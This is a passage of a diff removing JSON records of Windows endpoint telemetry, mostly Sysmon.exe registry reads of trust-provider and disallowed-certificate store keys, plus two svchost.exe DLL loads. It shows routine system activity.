"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "netprofm.dll", - "image_path": "C:\\Windows\\System32\\netprofm.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "npmproxy.dll", - "image_path": "C:\\Windows\\System32\\npmproxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 